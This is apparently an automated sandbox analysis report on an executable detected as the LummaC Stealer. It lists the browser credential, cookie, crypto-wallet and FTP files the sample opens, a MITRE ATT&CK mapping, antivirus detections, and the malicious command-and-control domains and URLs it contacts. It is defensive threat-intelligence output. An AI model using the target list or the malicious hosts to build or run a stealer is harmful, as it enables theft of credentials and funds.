            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\filename.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: filename.exe PID: 7512, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: filename.exe PID: 7512, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		21
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Screen Capture            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory21
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares41
            Data from Local System            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object Model2
            Clipboard Data            		114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing            		LSA Secrets22
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            filename.exe53%VirustotalBrowse
            filename.exe66%ReversingLabsWin32.Trojan.LummaC
            filename.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://sputnik-1985.com/api%H100%Avira URL Cloudmalware
            https://sputnik-1985.com/apiDX100%Avira URL Cloudmalware
            enterwahsh.biz100%Avira URL Cloudmalware
            https://sputnik-1985.com/api.100%Avira URL Cloudmalware
            https://sputnik-1985.com/VL100%Avira URL Cloudmalware
            https://bashfulacid.lat/pi100%Avira URL Cloudmalware
            https://sputnik-1985.com/apice100%Avira URL Cloudmalware
            https://community.fas0%Avira URL Cloudsafe
            https://sputnik-1985.com:443/api100%Avira URL Cloudmalware
            https://sputnik-1985.com/100%Avira URL Cloudmalware
            https://sputnik-1985.com/apiS100%Avira URL Cloudmalware
            https://sputnik-1985.com//100%Avira URL Cloudmalware
            https://sputnik-1985.com/apif100%Avira URL Cloudmalware
            https://sputnik-1985.com/apip100%Avira URL Cloudmalware
            https://bashfulacid.lat/pic1100%Avira URL Cloudmalware
            https://sputnik-1985.com/apil100%Avira URL Cloudmalware
            https://sputnik-1985.com/2L100%Avira URL Cloudmalware
            https://sputnik-1985.com/apixO100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            steamcommunity.com
            		104.102.49.254
            		truefalse
              		high
              s-part-0017.t-0009.t-msedge.net
              		13.107.246.45
              		truefalse
                		high
                sputnik-1985.com
                		104.21.48.1
                		truefalse
                  		high
                  wordyfindy.lat
                  		unknown
                  		unknownfalse
                    		high
                    slipperyloo.lat
                    		unknown
                    		unknownfalse
                      		high
                      curverpluch.lat
                      		unknown
                      		unknownfalse
                        		high
                        tentabatte.lat
                        		unknown
                        		unknownfalse
                          		high
                          manyrestro.lat
                          		unknown
                          		unknownfalse
                            		high
                            bashfulacid.lat
                            		unknown
                            		unknownfalse
                              		high
                              198.187.3.20.in-addr.arpa
                              		unknown
                              		unknownfalse
                                		high
                                shapestickyr.lat
                                		unknown
                                		unknownfalse
                                  		high
                                  enterwahsh.biz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    50.23.12.20.in-addr.arpa
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      talkynicer.lat
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        slipperyloo.latfalse
                                          		high
                                          https://sputnik-1985.com/apifalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              enterwahsh.biztrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              curverpluch.latfalse
                                                		high
                                                tentabatte.latfalse
                                                  		high
                                                  manyrestro.latfalse
                                                    		high
                                                    bashfulacid.latfalse
                                                      		high
                                                      wordyfindy.latfalse
                                                        		high
                                                        shapestickyr.latfalse
                                                          		high
                                                          talkynicer.latfalse
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/chrome_newtabfilename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcastsfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://store.steampowered.com/subscriber_agreement/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://sputnik-1985.com/api%Hfilename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://www.valvesoftware.com/legal.htmfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://sputnik-1985.com/VLfilename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://store.steampowered.com/privacy_agreement/filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://sputnik-1985.com/apiDXfilename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://store.steampowered.com/points/shop/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://ocsp.rootca1.amazontrust.com0:filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&afilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.ecosia.org/newtab/filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfilename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://store.steampowered.com/privacy_agreement/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_Afilename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://sputnik-1985.com/filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              		unknown
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstaticfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://sputnik-1985.com/apicefilename.exe, 00000000.00000003.1468864624.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    https://store.steampowered.com/about/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fasfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://steamcommunity.com/my/wishlist/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://help.steampowered.com/en/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://steamcommunity.com/market/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://store.steampowered.com/news/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://store.steampowered.com/subscriber_agreement/filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfilename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/discussions/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://store.steampowered.com/stats/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://sputnik-1985.com/api.filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              		unknown
                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&afilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/steam_refunds/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modaPfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://x1.c.lencr.org/0filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://x1.i.lencr.org/0filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://bashfulacid.lat/pifilename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          		unknown
                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfilename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=efilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://sputnik-1985.com:443/apifilename.exe, 00000000.00000002.1532096286.0000000000945000.00000004.00000020.00020000.00000000.sdmpfalse
